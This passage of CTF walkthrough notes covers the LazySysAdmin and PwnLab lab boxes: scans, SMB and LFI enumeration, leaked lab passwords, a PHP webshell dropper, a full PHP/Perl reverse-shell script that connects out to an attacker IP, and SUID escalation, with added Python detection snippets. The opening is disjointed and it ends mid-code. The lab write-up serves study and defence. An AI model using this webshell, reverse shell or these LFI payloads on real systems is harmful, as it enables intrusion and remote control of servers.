
Privilege escalation notes

List every SUID executable present on the system

$ find / -user root -perm -4000 -print 2>/dev/null
$ find / -perm -u=s -type f 2>/dev/null
$ find / -user root -perm -4000 -exec ls -ldb {} \;

All of the binaries listed above execute with root privileges, because their permission bits include an "s" and they are owned by root.

If the find command itself is SUID, every command executed through find's -exec also runs as root.

$ touch pentestlab
$ find pentestlab -exec whoami \;
Most Linux distributions ship netcat, so it too can be used to escalate to root.

First look at the site's source to find where the images are stored; one of them has an unusual file name, which decodes from base64 as:

AAEAAQAAAAAAAAdJAAAAJDhiNGY1YTk3LTQ3NTctNDE1Ny1hZmU4LTlhMWE4
I$8b4f5a97-4757-4157-afe8-9a1a8

nmap

# divint3 @ Divint3 in ~ [21:49:41] C:130
$ nmap 172.17.135.63 -sV -Pn

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-27 21:53 CST
Nmap scan report for 172.17.135.63
Host is up (0.020s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.79 seconds

# divint3 @ Divint3 in ~ [21:53:15]
$ nmap 172.17.135.63 -sV -Pn -A

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-27 21:53 CST
Stats: 0:00:15 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 21:54 (0:00:00 remaining)
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 21:54 (0:00:00 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 21:54 (0:00:00 remaining)
Nmap scan report for 172.17.135.63
Host is up (0.015s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|_ 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1.0
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 10.160.110.191
|_ error: Closing link: (nmap@10.160.110.191) [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 40m48s, deviation: 0s, median: 40m48s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2019-05-28T00:34:48+10:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.90 seconds

Bring out dirb

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May 27 21:38:27 2019
URL_BASE: http://172.17.135.63/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://172.17.135.63/ ----
==> DIRECTORY: http://172.17.135.63/apache/
+ http://172.17.135.63/index.html (CODE:200|SIZE:36072)
+ http://172.17.135.63/info.php (CODE:200|SIZE:77255)
==> DIRECTORY: http://172.17.135.63/javascript/
==> DIRECTORY: http://172.17.135.63/old/
==> DIRECTORY: http://172.17.135.63/phpmyadmin/
+ http://172.17.135.63/robots.txt (CODE:200|SIZE:92)
+ http://172.17.135.63/server-status (CODE:403|SIZE:293)
==> DIRECTORY: http://172.17.135.63/test/
==> DIRECTORY: http://172.17.135.63/wordpress/
==> DIRECTORY: http://172.17.135.63/wp/

Anonymous SMB access

# divint3 @ Divint3 in ~ [22:46:26] 
$ smbclient -L 172.17.135.63
WARNING: The "syslog" option is deprecated
Enter divint3's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

Server Comment
--------- -------
DESKTOP-IN4T2GV
LAZYSYSADMIN Web server

Workgroup Master
--------- -------
WORKGROUP DESKTOP-IN4T2GV


# divint3 @ Divint3 in ~ [22:20:32]
$ smbclient //172.17.135.63/share$

WARNING: The "syslog" option is deprecated
Enter divint3's password:
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \> ls
. D 0 Tue Aug 15 19:05:52 2017
.. D 0 Mon Aug 14 20:34:47 2017
wordpress D 0 Tue Aug 15 19:21:08 2017
Backnode_files D 0 Mon Aug 14 20:08:26 2017
wp D 0 Tue Aug 15 18:51:23 2017
deets.txt N 139 Mon Aug 14 20:20:05 2017
robots.txt N 92 Mon Aug 14 20:36:14 2017
todolist.txt N 79 Mon Aug 14 20:39:56 2017
apache D 0 Mon Aug 14 20:35:19 2017
index.html N 36072 Sun Aug 6 13:02:15 2017
info.php N 20 Tue Aug 15 18:55:19 2017
test D 0 Mon Aug 14 20:35:10 2017
old D 0 Mon Aug 14 20:35:13 2017

3029776 blocks of size 1024. 1237820 blocks available
smb: \> get todolist.txt
getting file \todolist.txt of size 79 as todolist.txt (8.6 KiloBytes/sec) (average 8.6 KiloBytes/sec)
smb: \> get deets.txt
getting file \deets.txt of size 139 as deets.txt (5.0 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \>
smb: \> cd wordpress
smb: \wordpress\> ls
. D 0 Tue Aug 15 19:21:08 2017
.. D 0 Tue Aug 15 19:05:52 2017
wp-config-sample.php N 2853 Wed Dec 16 17:58:26 2015
wp-trackback.php N 4513 Sat Oct 15 03:39:28 2016
wp-admin D 0 Thu Aug 3 05:02:02 2017
wp-settings.php N 16200 Fri Apr 7 02:01:42 2017
wp-blog-header.php N 364 Sat Dec 19 19:20:28 2015
index.php N 418 Wed Sep 25 08:18:11 2013
wp-cron.php N 3286 Mon May 25 01:26:25 2015
wp-links-opml.php N 2422 Mon Nov 21 10:46:30 2016
readme.html N 7413 Mon Dec 12 16:01:39 2016
wp-signup.php N 29924 Tue Jan 24 19:08:42 2017
wp-content D 0 Mon Aug 21 18:07:27 2017
license.txt N 19935 Tue Jan 3 01:58:42 2017
wp-mail.php N 8048 Wed Jan 11 13:13:43 2017
wp-activate.php N 5447 Wed Sep 28 05:36:28 2016
.htaccess H 35 Tue Aug 15 19:40:13 2017
xmlrpc.php N 3065 Thu Sep 1 00:31:29 2016
wp-login.php N 34327 Sat May 13 01:12:46 2017
wp-load.php N 3301 Tue Oct 25 11:15:30 2016
wp-comments-post.php N 1627 Mon Aug 29 20:00:32 2016
wp-config.php N 3703 Mon Aug 21 17:25:14 2017
wp-includes D 0 Thu Aug 3 05:02:03 2017

3029776 blocks of size 1024. 1237744 blocks available
smb: \wordpress\> get wp-config.php
getting file \wordpress\wp-config.php of size 3703 as wp-config.php (452.0 KiloBytes/sec) (average 452.0 KiloBytes/sec)
smb: \wordpress\>

deets.txt
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345


todolist.txt

Prevent users from being able to view to web root using the local file browser

wp-config.php contains the database configuration, so download it

<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/

define('AUTH_KEY', 'SAq-)W,-K9tFcW(=?ro4SJ5)R.mx%+@KL-I@PB{<-i>g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY', 'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY', 'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY', ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT', '(:^<BWwzWYx ,f^9anxD,+V+2-&,VJ@@)U7CSzjv_MvD67>?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT', '=M_DRp%vGmijIhl%K!(v>:,*RR<cl9ahav%{q`&I/0HD/$W/LK:mxR37PKh?Zzi8');
define('NONCE_SALT', 'ABOgE>G:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');

;

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');

/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');


/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

Visiting http://172.17.135.63/wordpress/ gives the hint "my name is togie".

SSH in with ssh togie@172.17.135.63, password 12345

togie@LazySysAdmin:~$ cd 
-rbash: cd: restricted
Switch to bash

sudo -s escalates to root

togie@LazySysAdmin:~$ sudo -s
[sudo] password for togie:
root@LazySysAdmin:~# whoami
root
root@LazySysAdmin:~# id
uid=0(root) gid=0(root) groups=0(root)

root's shell also defaults to rbash, so switch to bash; /etc/passwd lists bash as the shell, yet cd still does not work

root@LazySysAdmin:/root# cat proof.txt 
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu

Target 71

nmap scan

$ nmap 172.17.135.71 -sS -Pn -O

Starting Nmap 7.40 ( https://nmap.org ) at 2019-05-23 21:03 CST
Nmap scan report for 172.17.135.71
Host is up (0.0034s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
3306/tcp open mysql
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 3 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.27 seconds

dirb scan

$ dirb http://172.17.135.71 ctf/dir/php.txt 

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu May 23 21:12:43 2019
URL_BASE: http://172.17.135.71/
WORDLIST_FILES: ctf/dir/php.txt

-----------------

GENERATED WORDS: 3355

---- Scanning URL: http://172.17.135.71/ ----
+ http://172.17.135.71//index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../ (CODE:200|SIZE:332)
+ http://172.17.135.71//index.php (CODE:200|SIZE:332)
+ http://172.17.135.71//config.php (CODE:200|SIZE:0)
+ http://172.17.135.71//login.php (CODE:200|SIZE:250)
+ http://172.17.135.71//upload.php?action=upfile (CODE:200|SIZE:19)
+ http://172.17.135.71//upload.php (CODE:200|SIZE:19)
+ http://172.17.135.71//upload/ (CODE:200|SIZE:4774)
+ http://172.17.135.71//../admin (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin.php (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/default (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/default.php (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/index (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/index.php (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/login (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/login.php (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/manage (CODE:400|SIZE:305)
+ http://172.17.135.71//../admin/manage.php (CODE:400|SIZE:305)

-----------------
END_TIME: Thu May 23 21:12:51 2019
DOWNLOADED: 3355 - FOUND: 17


$ dirb http://172.17.135.71 ctf/dir/dir.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Thu May 23 21:13:38 2019
URL_BASE: http://172.17.135.71/
WORDLIST_FILES: ctf/dir/dir.txt

-----------------

GENERATED WORDS: 1170

---- Scanning URL: http://172.17.135.71/ ----
+ http://172.17.135.71//images/ (CODE:200|SIZE:942)
+ http://172.17.135.71//upload (CODE:301|SIZE:315)
+ http://172.17.135.71//images (CODE:301|SIZE:315)

-----------------
END_TIME: Thu May 23 21:13:41 2019
DOWNLOADED: 1170 - FOUND: 3

Suspicious spot: http://172.17.135.71/index.php?page=login names a page, so try supplying a PHP stream wrapper instead (background on wrappers: https://lorexxar.cn/2016/09/14/php-wei/). http://172.17.135.71/index.php?page=php://filter/read=convert.base64-encode/resource=index.php returns nothing, because the parameter above is a page name without the extension (?page=login), so use php://filter/read=convert.base64-encode/resource=index instead

index.php

<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
<?php
if (isset($_GET['page']))
{
include($_GET['page'].".php");
}
else
{
echo "Use this server to upload and share image files inside the intranet";
}
?>
</center>
</body>
</html>

login

<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
$luser = $_POST['user'];
$lpass = base64_encode($_POST['pass']);

$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
$stmt->bind_param('ss', $luser, $lpass);

$stmt->execute();
$stmt->store_Result();

if ($stmt->num_rows == 1)
{
$_SESSION['user'] = $luser;
header('Location: ?page=upload');
}
else
{
echo "Login failed.";
}
}
else
{
?>
<form action="" method="POST">
<label>Username: </label><input id="user" type="test" name="user"><br />
<label>Password: </label><input id="pass" type="password" name="pass"><br />
<input type="submit" name="submit" value="Login">
</form>
<?php
}

config

<?php
$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";
?>

upload

<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
<body>
<form action='' method='post' enctype='multipart/form-data'>
<input type='file' name='file' id='file' />
<input type='submit' name='submit' value='Upload'/>
</form>
</body>
</html>
<?php
if(isset($_POST['submit'])) {
if ($_FILES['file']['error'] <= 0) {
$filename = $_FILES['file']['name'];
$filetype = $_FILES['file']['type'];
$uploaddir = 'upload/';
$file_ext = strrchr($filename, '.');
$imageinfo = getimagesize($_FILES['file']['tmp_name']);
$whitelist = array(".jpg",".jpeg",".gif",".png");

if (!(in_array($file_ext, $whitelist))) {
die('Not allowed extension, please upload images only.');
}

if(strpos($filetype,'image') === false) {
die('Error 001');
}

if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
die('Error 002');
}

if(substr_count($filetype, '/')>1){
die('Error 003');
}

$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
echo "<img src=\"".$uploadfile."\"><br />";
} else {
die('Error 4');
}
}
}

?>

The next step is to log into MySQL and dump the login passwords

$ mysql -uroot -h 172.17.135.71 -p

Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 23929
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.00 sec)

kent JWzXuBJJNy
mike SIfdsTEn6I
kane iSv5Ym2GRo

After logging in, try uploading a file; the checks are too strict to get anything through. Auditing the code reveals:

if (isset($_COOKIE['lang']))
{
include("lang/".$_COOKIE['lang']);
}
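As an added example that is not part of the original write-up: Python detection logic run over constructed Apache access-log lines for the two include() sinks in this index.php, the ?page= parameter and the lang cookie. Cookies do not appear in the access log, so only ?page= shows up in the sample; the allowlists (login, upload, en.lang.php) are assumptions taken from the links and the comment in index.php.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines (not real traffic) modelled on the requests
# made against index.php on this box; the query string is what include() receives.
SAMPLE_LOG = """\
172.17.135.1 - - [23/May/2019:21:20:01 +0800] "GET /index.php?page=login HTTP/1.1" 200 582
172.17.135.1 - - [23/May/2019:21:20:09 +0800] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=index HTTP/1.1" 200 1404
172.17.135.1 - - [23/May/2019:21:20:15 +0800] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 110
172.17.135.1 - - [23/May/2019:21:21:02 +0800] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 332
172.17.135.1 - - [23/May/2019:21:22:40 +0800] "GET /index.php?page=upload HTTP/1.1" 200 912
172.17.135.1 - - [23/May/2019:21:23:11 +0800] "GET /index.php?page=upload/068ae40523a24c9ef54edefd375e542d.gif HTTP/1.1" 200 4774
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Values index.php hands straight to include(), and the only values it should ever see
# (assumed from the links and the commented-out setcookie in index.php).
ALLOWED = {"page": {"login", "upload"}, "lang": {"en.lang.php"}}
WRAPPER_RE = re.compile(r"^[a-z][a-z0-9.+-]*:", re.IGNORECASE)   # php:, data:, expect:, file:, ...


def classify_include_value(param, value):
    """Reasons a value handed to include() via `param` looks hostile (empty list = fine)."""
    v = unquote(value)            # accepts raw or already-decoded input
    reasons = []
    if WRAPPER_RE.match(v):
        reasons.append("stream wrapper")
    if "../" in v or "..\\" in v:
        reasons.append("directory traversal")
    if "\x00" in v:
        reasons.append("null byte")
    if not reasons and v not in ALLOWED.get(param, set()):
        reasons.append("not an allowed page name")
    return reasons


def scan_access_log(text):
    """Return (line_no, param, value, reasons) for requests whose include() parameter looks hostile."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key in ALLOWED:
                reasons = classify_include_value(key, value)
                if reasons:
                    findings.append((n, key, value, reasons))
    return findings
```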
Reference material

Write a dropper that writes out a webshell file

GIF89a
<?php
$file=fopen("divint3.php","w");
$ma="<?php @eval($_POST[divint3]); ?>";
fwrite($file, $ma);
fclose($file)

This failed, since it is unclear where the dropped file ended up. Using a small shell instead: the upload lands at upload/068ae40523a24c9ef54edefd375e542d.gif; configure AntSword and connect successfully. A divint3.php file is present, but the divint3.php in the web root does not contain what I wrote, which remains unexplained

find / -perm -u=s -type f 2>/dev/null

/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4

lsb_release -a  # distribution release
getconf GNU_LIBC_VERSION  # glibc version
glibc 2.19

Tried escalating via pt_chown; no effect

env
set
export

Reverse shell script

<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}

$yourip = "10.160.108.146";
$yourport = "2333";
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");

First check the available shells

(www-data:/var/www/html) $ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

Popping a shell back with nc from the nologin account returns a nologin shell; use python -c "import pty;pty.spawn('/bin/rbash')" to get an interactive shell

su to kane with iSv5Ym2GRo; login succeeds and yields a fake flag, flag{T5566Y}

Check .bash_history

kane@pwnlab:~$ cat .bash_history
cat .bash_history
uid
id
ls
./222.sh
ls
cd /hmoe
cd /home
ls
cd /mike
cat mike
ls -al
cd ~
ls -al
echo '/bin/sh' >> 222.sh
chmod 777 222.sh
ls
./222.sh
echo `/bin/sh`
export PATH=./:$PATH
./msgike
ls -al
./msgmike
echo '/bin/sh' > cat
chmod 777 cat
ls
./msgmike

Check SUID binaries again

kane@pwnlab:/home$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
/home/kane/msgmike
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/at
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4

msgmike turns out to be SUID

kane@pwnlab:~$ ls -la
ls -la
total 40
drwxr-x--- 2 kane kane 4096 May 26 03:19 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw------- 1 kane kane 244 Apr 25 09:53 .bash_history
-rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc
-rwxrwxrwx 1 kane kane 10 May 21 09:56 cat
-rw-r--r-- 1 root root 13 Apr 25 10:32 flag_wrong.txt
-rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike
-rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile
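An added example that is not part of the original write-up: the `find / -perm -u=s -type f` sweep from the top of the page in Python, plus a triage step that would have singled out /home/kane/msgmike (outside the packaged binary directories, owned by mike, setuid and setgid) from the otherwise stock list. The directory allowlist and the sample tree are assumptions constructed for the demo.

```python
import os
import stat
import tempfile

# Directories where distributions install their legitimate setuid binaries; every
# entry in the find output above lives under one of them except /home/kane/msgmike.
EXPECTED_SUID_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib", "/usr/libexec")


def find_suid(root):
    """Equivalent of `find ROOT -perm -u=s -type f 2>/dev/null`: (path, uid, mode) triples."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue                   # unreadable or vanished, like 2>/dev/null
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append((path, st.st_uid, stat.S_IMODE(st.st_mode)))
    return found


def triage_suid(entries, baseline=(), expected_dirs=EXPECTED_SUID_DIRS, root_uid=0):
    """Return {path: [reasons]} for setuid files that deserve a second look."""
    flagged = {}
    for path, uid, mode in entries:
        reasons = []
        if baseline and path not in baseline:
            reasons.append("not in baseline")
        if not any(path.startswith(d + "/") for d in expected_dirs):
            reasons.append("outside packaged binary directories")
        if uid != root_uid:
            reasons.append("owned by uid %d, not root" % uid)
        if mode & stat.S_ISGID:
            reasons.append("also setgid")
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append("writable by group or others")
        if reasons:
            flagged[path] = reasons
    return flagged


def demo():
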